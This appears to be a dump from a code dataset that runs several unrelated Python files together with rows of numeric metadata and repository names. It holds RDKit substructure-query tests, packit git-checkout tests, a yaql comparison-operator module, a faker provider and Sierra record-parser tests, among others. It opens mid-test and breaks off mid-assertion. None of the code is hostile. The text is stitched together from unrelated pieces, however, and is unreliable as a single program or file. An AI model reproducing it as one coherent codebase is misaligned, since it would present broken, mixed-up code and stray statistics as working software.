testmol = Chem.MolFromSmiles('CCS')
s = """
fragment a{
X labeled c1
& labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((1, 2),)))
def test_atom_constraint1(self):
testmol = Chem.MolFromSmiles('CCC')
s = """
fragment a{
C labeled c1
C labeled c2 single bond to c1 {connected to =2 C}
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1), (2, 1))))
def test_atom_constraint2(self):
testmol = Chem.MolFromSmiles('CCC')
s = """
fragment a{
C labeled c1
C labeled c2 single bond to c1 {connected to =1 C}
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((1, 0), (1, 2))))
def test_atom_constraint3(self):
testmol = Chem.MolFromSmiles('CC=C')
s = """
fragment a{
C labeled c1
C labeled c2 single bond to c1 {connected to =1 C with double bond}
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1),)))
def test_atom_constraint4(self):
testmol = Chem.MolFromSmiles('CC=C')
s = """
fragment a{
C labeled c1 {connected to >1 C with any bond}
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((1,),)))
def test_atom_constraint5(self):
testmol = Chem.MolFromSmiles('CC=C')
s = """
fragment a{
C labeled c1 {!connected to >1 C with any bond}
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, ), (2, ))))
def test_atom_constraint6(self):
testmol = Chem.MolFromSmiles('CC1CCC1')
s = """
fragment a{
C labeled c1 {!in ring of size >0}
C labeled c2 single bond to c1 {in ring of size >0}
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1),)))
def test_atom_prefix1(self):
testmol = Chem.MolFromSmiles('CC1CCC1')
s = """
fragment a{
nonringatom C labeled c1
ringatom C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1),)))
def test_atom_prefix2(self):
testmol = Chem.MolFromSmiles('Cc1ccccc1')
s = """
fragment a{
nonaromatic C labeled c1
aromatic C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1),)))
def test_atom_prefix3(self):
testmol = Chem.MolFromSmiles('CC=C')
s = """
fragment a{
C labeled c1
allylic C labeled c2 single bond to c1
}
"""
molquery = Read(s)
match_index = molquery.GetQueryMatches(testmol)
self.assertListEqual(sorted(match_index),
sorted(((0, 1),)))
if __name__ == '__main__':
unittest.main()
| 32.094527
| 79
| 0.481631
| 1,390
| 12,902
| 4.380576
| 0.079137
| 0.095254
| 0.07144
| 0.133355
| 0.866481
| 0.842503
| 0.800131
| 0.773033
| 0.751519
| 0.746592
| 0
| 0.050129
| 0.400093
| 12,902
| 401
| 80
| 32.174564
| 0.736563
| 0.001628
| 0
| 0.653951
| 0
| 0
| 0.286513
| 0
| 0
| 0
| 0
| 0
| 0.079019
| 1
| 0.079019
| false
| 0
| 0.008174
| 0
| 0.089918
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8a5f5c1f7ef5252d4d1bc59e5dc9d0a1cff4291b
| 152
|
py
|
Python
|
twitter_sentence_generator/transformers/list_transformer.py
|
DEV3L/python-heroku-twitter-random-sentence-generator
|
ca19ea5c5450a2998964beda2792000aa0c2521a
|
[
"Beerware"
] | 1
|
2021-01-12T17:06:54.000Z
|
2021-01-12T17:06:54.000Z
|
twitter_sentence_generator/transformers/list_transformer.py
|
DEV3L/python-heroku-twitter-random-sentence-generator
|
ca19ea5c5450a2998964beda2792000aa0c2521a
|
[
"Beerware"
] | null | null | null |
twitter_sentence_generator/transformers/list_transformer.py
|
DEV3L/python-heroku-twitter-random-sentence-generator
|
ca19ea5c5450a2998964beda2792000aa0c2521a
|
[
"Beerware"
] | null | null | null |
class ListTransformer():
def __init__(self, _list):
self._list = _list
@property
def tuple(self):
return tuple(self._list)
| 19
| 32
| 0.618421
| 17
| 152
| 5.058824
| 0.529412
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.276316
| 152
| 7
| 33
| 21.714286
| 0.781818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
8a69d1114364f2cb12f99b99c1f1ad009a640866
| 2,849
|
py
|
Python
|
tests/integration/test_local_project.py
|
cheese/packit
|
790b01a30575b6bfd680fdc991542ba60e40a9f2
|
[
"MIT"
] | 1
|
2020-12-28T18:00:22.000Z
|
2020-12-28T18:00:22.000Z
|
tests/integration/test_local_project.py
|
cheese/packit
|
790b01a30575b6bfd680fdc991542ba60e40a9f2
|
[
"MIT"
] | 7
|
2020-12-28T19:57:35.000Z
|
2021-04-17T14:43:15.000Z
|
tests/integration/test_local_project.py
|
cheese/packit
|
790b01a30575b6bfd680fdc991542ba60e40a9f2
|
[
"MIT"
] | null | null | null |
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
import subprocess
from pathlib import Path
from ogr import GithubService, GitlabService
from packit.local_project import LocalProject
from tests.spellbook import initiate_git_repo
def test_pr_id_and_ref(tmp_path: Path):
""" p-s passes both ref and pr_id, we want to check out PR """
remote = tmp_path / "remote"
remote.mkdir()
subprocess.check_call(["git", "init", "--bare", "."], cwd=remote)
upstream_git = tmp_path / "upstream_git"
upstream_git.mkdir()
initiate_git_repo(upstream_git, push=True, upstream_remote=str(remote))
# mimic github PR
pr_id = "123"
ref = (
subprocess.check_output(["git", "rev-parse", "HEAD^"], cwd=upstream_git)
.strip()
.decode()
)
local_tmp_branch = "asdqwe"
subprocess.check_call(["git", "branch", local_tmp_branch, ref], cwd=upstream_git)
subprocess.check_call(
["git", "push", "origin", f"{local_tmp_branch}:refs/pull/{pr_id}/head"],
cwd=upstream_git,
)
subprocess.check_call(["git", "branch", "-D", local_tmp_branch], cwd=upstream_git)
LocalProject(
working_dir=upstream_git,
offline=True,
pr_id=pr_id,
ref=ref,
git_service=GithubService(),
)
assert (
subprocess.check_output(
["git", "rev-parse", "--abbrev-ref", "HEAD"], cwd=upstream_git
)
.strip()
.decode()
== f"pr/{pr_id}"
)
def test_pr_id_and_ref_gitlab(tmp_path: Path):
""" p-s passes both ref and pr_id, we want to check out PR """
remote = tmp_path / "remote"
remote.mkdir()
subprocess.check_call(["git", "init", "--bare", "."], cwd=remote)
upstream_git = tmp_path / "upstream_git"
upstream_git.mkdir()
initiate_git_repo(upstream_git, push=True, upstream_remote=str(remote))
# mimic gitlab MR
pr_id = "123"
ref = (
subprocess.check_output(["git", "rev-parse", "HEAD^"], cwd=upstream_git)
.strip()
.decode()
)
local_tmp_branch = "asdqwe"
subprocess.check_call(["git", "branch", local_tmp_branch, ref], cwd=upstream_git)
subprocess.check_call(
[
"git",
"push",
"origin",
f"{local_tmp_branch}:refs/merge-requests/{pr_id}/head",
],
cwd=upstream_git,
)
subprocess.check_call(["git", "branch", "-D", local_tmp_branch], cwd=upstream_git)
LocalProject(
working_dir=upstream_git,
offline=True,
pr_id=pr_id,
ref=ref,
git_service=GitlabService(token="12345"),
)
assert (
subprocess.check_output(
["git", "rev-parse", "--abbrev-ref", "HEAD"], cwd=upstream_git
)
.strip()
.decode()
== f"pr/{pr_id}"
)
| 29.677083
| 86
| 0.607582
| 352
| 2,849
| 4.667614
| 0.221591
| 0.133901
| 0.08521
| 0.107121
| 0.821668
| 0.821668
| 0.800974
| 0.800974
| 0.800974
| 0.800974
| 0
| 0.005143
| 0.24921
| 2,849
| 95
| 87
| 29.989474
| 0.762973
| 0.076869
| 0
| 0.675
| 0
| 0
| 0.135807
| 0.035195
| 0
| 0
| 0
| 0
| 0.025
| 1
| 0.025
| false
| 0
| 0.0625
| 0
| 0.0875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8a6a9973398dffc8ceede3ec2f004b9b182d900a
| 141
|
py
|
Python
|
my/materialistic.py
|
aluhrs13/HPI
|
e750666e30e8987f3a4c46755857dc85dd64446c
|
[
"MIT"
] | 69
|
2019-10-04T03:07:17.000Z
|
2020-03-13T14:53:15.000Z
|
my/materialistic.py
|
aluhrs13/HPI
|
e750666e30e8987f3a4c46755857dc85dd64446c
|
[
"MIT"
] | 1
|
2019-10-15T22:50:57.000Z
|
2019-10-15T23:00:28.000Z
|
my/materialistic.py
|
aluhrs13/HPI
|
e750666e30e8987f3a4c46755857dc85dd64446c
|
[
"MIT"
] | 1
|
2020-01-02T12:13:18.000Z
|
2020-01-02T12:13:18.000Z
|
from .core.warnings import high
high("DEPRECATED! Please use my.hackernews.materialistic instead.")
from .hackernews.materialistic import *
| 28.2
| 67
| 0.808511
| 17
| 141
| 6.705882
| 0.705882
| 0.403509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099291
| 141
| 4
| 68
| 35.25
| 0.897638
| 0
| 0
| 0
| 0
| 0
| 0.41844
| 0.191489
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8a9711997accb9770342d7917e0cade0024c9d4a
| 145
|
py
|
Python
|
Euclid/test.py
|
Joe1sn/CryotoWork
|
34bb3d98b975e69f3e977c934e8c41f42ee129c8
|
[
"MIT"
] | null | null | null |
Euclid/test.py
|
Joe1sn/CryotoWork
|
34bb3d98b975e69f3e977c934e8c41f42ee129c8
|
[
"MIT"
] | null | null | null |
Euclid/test.py
|
Joe1sn/CryotoWork
|
34bb3d98b975e69f3e977c934e8c41f42ee129c8
|
[
"MIT"
] | null | null | null |
from Eucild import Eucild
print(Eucild(120,3))
print(Eucild(3,120))
print(Eucild(0,0))
print(Eucild(-2,-3))
print(Eucild("hello","world"))
| 20.714286
| 30
| 0.682759
| 24
| 145
| 4.125
| 0.416667
| 0.555556
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 0.103448
| 145
| 7
| 30
| 20.714286
| 0.669231
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.833333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
8aac30258b07c44f0ea7a8123af61956fbdef6cc
| 91
|
py
|
Python
|
faker/providers/date_time/es_ES/__init__.py
|
dandycheung/faker
|
3220f8299c8e6364eeca2007b726c9d22d50918c
|
[
"MIT"
] | null | null | null |
faker/providers/date_time/es_ES/__init__.py
|
dandycheung/faker
|
3220f8299c8e6364eeca2007b726c9d22d50918c
|
[
"MIT"
] | null | null | null |
faker/providers/date_time/es_ES/__init__.py
|
dandycheung/faker
|
3220f8299c8e6364eeca2007b726c9d22d50918c
|
[
"MIT"
] | null | null | null |
from ..es import Provider as DateTimeProvider
class Provider(DateTimeProvider):
pass
| 15.166667
| 45
| 0.78022
| 10
| 91
| 7.1
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164835
| 91
| 5
| 46
| 18.2
| 0.934211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
8ab65f2e207979d6b4bf30702e44cefe9fe48765
| 68
|
py
|
Python
|
client/pipes/__init__.py
|
chiaweil/pipelines
|
401706556799b258a51da4649c251d89462ec658
|
[
"Apache-2.0"
] | 1
|
2022-02-14T09:43:44.000Z
|
2022-02-14T09:43:44.000Z
|
client/pipes/__init__.py
|
chiaweil/pipelines
|
401706556799b258a51da4649c251d89462ec658
|
[
"Apache-2.0"
] | null | null | null |
client/pipes/__init__.py
|
chiaweil/pipelines
|
401706556799b258a51da4649c251d89462ec658
|
[
"Apache-2.0"
] | 1
|
2022-02-14T09:43:45.000Z
|
2022-02-14T09:43:45.000Z
|
from .client import *
from .inference import *
from .server import *
| 22.666667
| 24
| 0.75
| 9
| 68
| 5.666667
| 0.555556
| 0.392157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161765
| 68
| 3
| 25
| 22.666667
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
76f429fca7f4d3dbd8cef0539499f92c498e9feb
| 8,042
|
py
|
Python
|
yaql/standard_library/common.py
|
nzlosh/yaql
|
bb65fc64026d431ffb866d02825deb3a0e4b5943
|
[
"Apache-2.0"
] | 112
|
2015-10-18T02:57:41.000Z
|
2022-03-28T18:26:36.000Z
|
yaql/standard_library/common.py
|
nzlosh/yaql
|
bb65fc64026d431ffb866d02825deb3a0e4b5943
|
[
"Apache-2.0"
] | 3
|
2020-06-09T11:54:38.000Z
|
2021-04-30T06:12:37.000Z
|
yaql/standard_library/common.py
|
nzlosh/yaql
|
bb65fc64026d431ffb866d02825deb3a0e4b5943
|
[
"Apache-2.0"
] | 27
|
2015-12-10T00:10:02.000Z
|
2022-03-20T21:51:01.000Z
|
# Copyright (c) 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common module describes comparison operators for different types. Comparing
with null value is considered separately.
"""
from yaql.language import specs
@specs.name('*equal')
def eq(left, right):
""":yaql:operator =
Returns true if left and right are equal, false otherwise.
It is system function and can be used to override behavior
of comparison between objects.
"""
return left == right
@specs.name('*not_equal')
def neq(left, right):
""":yaql:operator !=
Returns true if left and right are not equal, false otherwise.
It is system function and can be used to override behavior
of comparison between objects.
"""
return left != right
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_<')
def left_lt_null(left, right):
""":yaql:operator <
Returns false. This function is called when left is not null and
right is null.
:signature: left < right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 < null
false
"""
return False
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_<=')
def left_lte_null(left, right):
""":yaql:operator <=
Returns false. This function is called when left is not null
and right is null.
:signature: left <= right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 <= null
false
"""
return False
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_>')
def left_gt_null(left, right):
""":yaql:operator >
Returns true. This function is called when left is not null
and right is null.
:signature: left > right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 > null
true
"""
return True
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_>=')
def left_gte_null(left, right):
""":yaql:operator >=
Returns true. This function is called when left is not null
and right is null.
:signature: left >= right
:arg left: left operand
:argType left: not null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> 1 >= null
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_<')
def null_lt_right(left, right):
""":yaql:operator <
Returns true. This function is called when left is null and
right is not.
:signature: left < right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null < 2
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_<=')
def null_lte_right(left, right):
""":yaql:operator <=
Returns true. This function is called when left is null and
right is not.
:signature: left <= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null <= 2
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_>')
def null_gt_right(left, right):
""":yaql:operator >
Returns false. This function is called when left is null and right
is not.
:signature: left > right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null > 2
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_>=')
def null_gte_right(left, right):
""":yaql:operator >=
Returns false. This function is called when left is null and
right is not.
:signature: left >= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: not null
:returnType: boolean
.. code:
yaql> null >= 2
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_<')
def null_lt_null(left, right):
""":yaql:operator <
Returns false. This function is called when left and right are null.
:signature: left < right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null < null
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_<=')
def null_lte_null(left, right):
""":yaql:operator <=
Returns true. This function is called when left and right are null.
:signature: left <= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null <= null
true
"""
return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_>')
def null_gt_null(left, right):
""":yaql:operator >
Returns false. This function is called when left and right are null.
:signature: left > right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null > null
false
"""
return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', type(None), nullable=True)
@specs.name('#operator_>=')
def null_gte_null(left, right):
""":yaql:operator >=
Returns true. This function is called when left and right are null.
:signature: left >= right
:arg left: left operand
:argType left: null
:arg right: right operand
:argType right: null
:returnType: boolean
.. code:
yaql> null >= null
true
"""
return True
def register(context):
context.register_function(eq)
context.register_function(neq)
context.register_function(left_lt_null)
context.register_function(left_lte_null)
context.register_function(left_gt_null)
context.register_function(left_gte_null)
context.register_function(null_lt_right)
context.register_function(null_lte_right)
context.register_function(null_gt_right)
context.register_function(null_gte_right)
context.register_function(null_lt_null)
context.register_function(null_lte_null)
context.register_function(null_gt_null)
context.register_function(null_gte_null)
| 23.175793
| 78
| 0.657797
| 1,038
| 8,042
| 5.024085
| 0.120424
| 0.048322
| 0.058677
| 0.061361
| 0.863471
| 0.792138
| 0.790221
| 0.788303
| 0.788303
| 0.788303
| 0
| 0.002584
| 0.230042
| 8,042
| 346
| 79
| 23.242775
| 0.839632
| 0.540164
| 0
| 0.585366
| 0
| 0
| 0.087275
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.182927
| false
| 0
| 0.012195
| 0
| 0.365854
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a029acc3f3049d4c570e788c164678931fdace5
| 32,346
|
py
|
Python
|
tests/test_sierra_parser.py
|
BookOps-CAT/QCbotB
|
258a3dd4a0b346c0fee82fe332e368c0b5c91440
|
[
"MIT"
] | null | null | null |
tests/test_sierra_parser.py
|
BookOps-CAT/QCbotB
|
258a3dd4a0b346c0fee82fe332e368c0b5c91440
|
[
"MIT"
] | 15
|
2018-01-19T17:39:08.000Z
|
2020-12-16T17:57:12.000Z
|
tests/test_sierra_parser.py
|
BookOps-CAT/QCbotB
|
258a3dd4a0b346c0fee82fe332e368c0b5c91440
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from datetime import datetime
from context import sierra_parser
class TestParser(unittest.TestCase):
"""Test parsing of Sierra lists exported to file"""
def test_verifying_bib_id(self):
self.assertEqual(
sierra_parser.verify_bib_id('b119955209'), 11995520)
self.assertEqual(
sierra_parser.verify_bib_id('b12081951x'), 12081951)
self.assertIsNone(
sierra_parser.verify_bib_id(''))
self.assertIsNone(
sierra_parser.verify_bib_id(None))
self.assertIsNone(
sierra_parser.verify_bib_id(11995520))
self.assertIsNone(
sierra_parser.verify_bib_id())
def test_verifying_ord_id(self):
self.assertEqual(
sierra_parser.verify_ord_id('o19259785'), 1925978)
self.assertEqual(
sierra_parser.verify_ord_id('o1926029X'), 1926029)
self.assertIsNone(
sierra_parser.verify_ord_id(''))
self.assertIsNone(
sierra_parser.verify_ord_id(None))
self.assertIsNone(
sierra_parser.verify_ord_id(1199552))
self.assertIsNone(
sierra_parser.verify_ord_id())
def test_parsing_dates(self):
date1 = datetime.now().strftime('%m-%d-%Y')
date2 = datetime.now().strftime('%m-%d-%y')
self.assertEqual(
sierra_parser.parse_dates(date1),
datetime.strptime(date1, '%m-%d-%Y'))
self.assertEqual(
sierra_parser.parse_dates(date2),
datetime.strptime(date2, '%m-%d-%y'))
self.assertIsNone(
sierra_parser.parse_dates('some string'))
self.assertIsNone(
sierra_parser.parse_dates(' - - '))
self.assertIsNone(
sierra_parser.parse_dates())
def test_verify_b_type(self):
self.assertEqual(
sierra_parser.verify_b_type(
'a'), 'a')
self.assertIsNone(
sierra_parser.verify_b_type(
''))
self.assertIsNone(
sierra_parser.verify_b_type(
' '))
self.assertIsNone(
sierra_parser.verify_b_type(
1))
def test_parse_title(self):
self.assertEqual(
sierra_parser.parse_title(
'880-02 [Perush ha-Ramban : ʻal ha-Torah] = Rambanh'),
'[Perush ha-Ramban : ʻal ha-Torah] = Rambanh')
self.assertEqual(
sierra_parser.parse_title(
'TEST TITLE'), 'TEST TITLE')
self.assertIsNone(
sierra_parser.parse_title(
''))
self.assertIsNone(
sierra_parser.parse_title())
def test_parse_name(self):
self.assertEqual(
sierra_parser.parse_name(
u'880-01 Shukshĭn, Vasiliĭ, 1929-1974'),
u'SHUKSHIN')
self.assertEqual(
sierra_parser.parse_name(
u'Ṿalder, Ḥayim.'),
u'VALDER')
self.assertEqual(
sierra_parser.parse_name(
u'Uderzo.'),
u'UDERZO')
self.assertIsNone(
sierra_parser.parse_name(
u''))
def test_parse_subjects(self):
self.assertEqual(
sierra_parser.parse_subjects(
'Automobile racing drivers -- Drama.~NASCAR (Association) -- Drama.~Fourth dimension. fast (OCoLC)fst00933422'),
'Automobile racing drivers -- Drama.~NASCAR (Association) -- Drama.')
self.assertEqual(
sierra_parser.parse_subjects(
''), '')
def test_parse_subject_person(self):
self.assertIsNone(
sierra_parser.parse_subject_person(
'Jackson, Percy (Fictitious character) -- '
'Juvenile fiction'))
self.assertEqual(
sierra_parser.parse_subject_person(
'Lincoln, Abraham, 1809-1865 -- Military leadership.~Other subject'),
'Lincoln, Abraham, 1809-1865 -- Military leadership.')
self.assertEqual(
sierra_parser.parse_subject_person(
'Doe, Joe. Title of his work.'),
'Doe, Joe. Title of his work.')
self.assertEqual(
sierra_parser.parse_subject_person(
'Randolph, Martha Jefferson, 1772-1836.~Women -- United States -- History -- 18th century'),
'Randolph, Martha Jefferson, 1772-1836.')
self.assertEqual(
sierra_parser.parse_subject_person(
'880-05 Wang, Yangming.~Philosophers -- China -- Biography.'),
'Wang, Yangming.')
# -- biography will most likely pick up false positives
self.assertEqual(
sierra_parser.parse_subject_person(
'Wang, Yangming.~Philosophers -- China -- Biography.'),
'Wang, Yangming.')
self.assertEqual(
sierra_parser.parse_subject_person(
'Wang.~Philosophers -- China -- Biography.'),
'Wang.')
self.assertIsNone(
sierra_parser.parse_subject_person(
'Some Topic.~Philosophers -- China.'))
self.assertIsNone(
sierra_parser.parse_subject_person(
'History, Millitary.'))
self.assertIsNone(
sierra_parser.parse_subject_person(
'Jews -- Poland -- Warsaw.~Righteous Gentiles in the Holocaust -- Poland -- Warsaw.~Holocaust, Jewish (1939-1945) -- Poland -- Warsaw.~World War, 1939-1945 -- Jews -- Rescue -- Poland -- Warsaw.'))
def test_parse_branches(self):
self.assertEqual(
sierra_parser.parse_branches(
'03yfc,80yfc,71yfc,65yfc,56yfc'),
'03,56,65,71,80')
self.assertEqual(
sierra_parser.parse_branches(
'03yfc(10),80 ,none '),
'03,80')
self.assertIsNone(
sierra_parser.parse_branches(
''))
self.assertEqual(
sierra_parser.parse_branches(
'elres'), '')
def test_parse_shelves(self):
# shelves in a string that is used to compare output
# must be in alphabetical order
self.assertEqual(
sierra_parser.parse_shelves(
'14anb(2),21anf,23abi,56 '),
'abi,anb,anf')
self.assertIsNone(
sierra_parser.parse_shelves(
'14 '))
self.assertIsNone(
sierra_parser.parse_shelves(
'none '))
self.assertEqual(
sierra_parser.parse_shelves(
'02jje(10),none ,21jje',), 'jje')
def test_parse_call_format(self):
self.assertEqual(
sierra_parser.parse_call_format(
'AUDIO B ADAMS C'), 'au')
self.assertEqual(
sierra_parser.parse_call_format(
'818 A'), 'pr')
self.assertEqual(
sierra_parser.parse_call_format(
'B BOOK C'), 'pr')
self.assertEqual(
sierra_parser.parse_call_format(
'DVD RUS J'), 'dv')
self.assertEqual(
sierra_parser.parse_call_format(
'BOOK & DVD 818 D'), 'ki')
self.assertEqual(
sierra_parser.parse_call_format(
'BOOK & CD'), 'ki')
self.assertEqual(
sierra_parser.parse_call_format(
'KIT'), 'ki')
self.assertEqual(
sierra_parser.parse_call_format(
'eBOOK'), 'er')
self.assertEqual(
sierra_parser.parse_call_format(
'eAUDIO'), 'er')
self.assertEqual(
sierra_parser.parse_call_format(
'eJOURNAL'), 'er')
self.assertEqual(
sierra_parser.parse_call_format(
'eMUSIC'), 'er')
self.assertEqual(
sierra_parser.parse_call_format(
'eVIDEO'), 'er')
self.assertEqual(
sierra_parser.parse_call_format(
'DVD-ROM 909 A'), 'er')
self.assertEqual(
sierra_parser.parse_call_format(
'CD-ROM 909 A'), 'er')
self.assertEqual(
sierra_parser.parse_call_format(
'LIB 782.1 AUBER'), 'li')
self.assertEqual(
sierra_parser.parse_call_format(
'Mu 780.4 K'), 'mu')
self.assertEqual(
sierra_parser.parse_call_format(
'NM 010.5 H'), 'nm')
self.assertEqual(
sierra_parser.parse_call_format(
'CD BLUES BO DIDDLEY'), 'cd')
self.assertEqual(
sierra_parser.parse_call_format(
'VIDEO'), 'vi')
self.assertEqual(
sierra_parser.parse_call_format(
'MIFI DEVICE'), 'mi')
self.assertEqual(
sierra_parser.parse_call_format(
''), 'pr')
self.assertEqual(
sierra_parser.parse_call_format(
'READALONG J 811 A'), 'ra')
self.assertEqual(
sierra_parser.parse_call_format(
'READALONG J FIC ADAMS'), 'ra')
def test_parse_call_audn(self):
self.assertEqual(
sierra_parser.parse_call_audn(
'J-E'), 'e')
self.assertEqual(
sierra_parser.parse_call_audn(
'J-E SCIESZKA'), 'e')
self.assertEqual(
sierra_parser.parse_call_audn(
'CHI J-E XI'), 'e')
self.assertEqual(
sierra_parser.parse_call_audn(
'CHI J-E'), 'e')
self.assertEqual(
sierra_parser.parse_call_audn(
'KIT J-E SCIESZKA'), 'e')
self.assertEqual(
sierra_parser.parse_call_audn(
